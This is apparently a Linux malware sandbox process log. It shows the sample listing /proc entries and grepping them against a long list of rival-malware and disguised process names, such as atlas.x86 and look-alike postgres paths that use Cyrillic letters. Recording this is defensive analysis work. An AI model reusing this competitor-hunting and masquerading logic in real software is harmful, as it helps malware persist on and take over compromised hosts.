/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1240
-
-
/bin/grepgrep exe2⤵PID:1243
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1242
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1245
-
-
/bin/grepgrep exe2⤵PID:1248
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1247
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep exe2⤵PID:1253
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1255
-
-
/bin/grepgrep exe2⤵PID:1258
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1257
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1262
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1268
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1267
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1272
-
-
/bin/grepgrep exe2⤵PID:1273
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1275
-
-
/bin/grepgrep exe2⤵PID:1278
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1277
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1280
-
-
/bin/grepgrep exe2⤵PID:1283
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1285
-
-
/bin/grepgrep exe2⤵PID:1289
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1288
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1292
-
-
/bin/grepgrep exe2⤵PID:1295
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1294
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1298
-
-
/bin/grepgrep exe2⤵PID:1302
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1301
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1304
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1311
-
-
/bin/grepgrep exe2⤵PID:1314
-
-
/bin/lsls -latrh /proc/net2⤵PID:1313
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1318
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1320
-
-
/bin/grepgrep exe2⤵PID:1321
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1323
-
-
/bin/grepgrep exe2⤵PID:1327
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1326
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1334
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1333
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1337
-
-
/bin/grepgrep exe2⤵PID:1340
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1343
-
-
/bin/grepgrep exe2⤵PID:1347
-
-
/bin/lsls -latrh /proc/self2⤵PID:1346
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1356
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1358
-
-
/bin/grepgrep exe2⤵PID:1359
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1362
-
-
/bin/grepgrep exe2⤵PID:1366
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep exe2⤵PID:1372
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1371
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1381
-
-
/bin/grepgrep exe2⤵PID:1385
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1384
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1387
-
-
/bin/grepgrep exe2⤵PID:1391
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1390
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1394
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1400
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1403
-
-
/bin/grepgrep exe2⤵PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1407
-
-
/bin/grepgrep exe2⤵PID:1411
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1413
-
-
/bin/grepgrep exe2⤵PID:1417
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1416
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/version2⤵PID:1422
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1427
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/bin/grepgrep exe2⤵PID:1433
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1432
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1435
-
-
/bin/grepgrep exe2⤵PID:1438
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1437
-
-
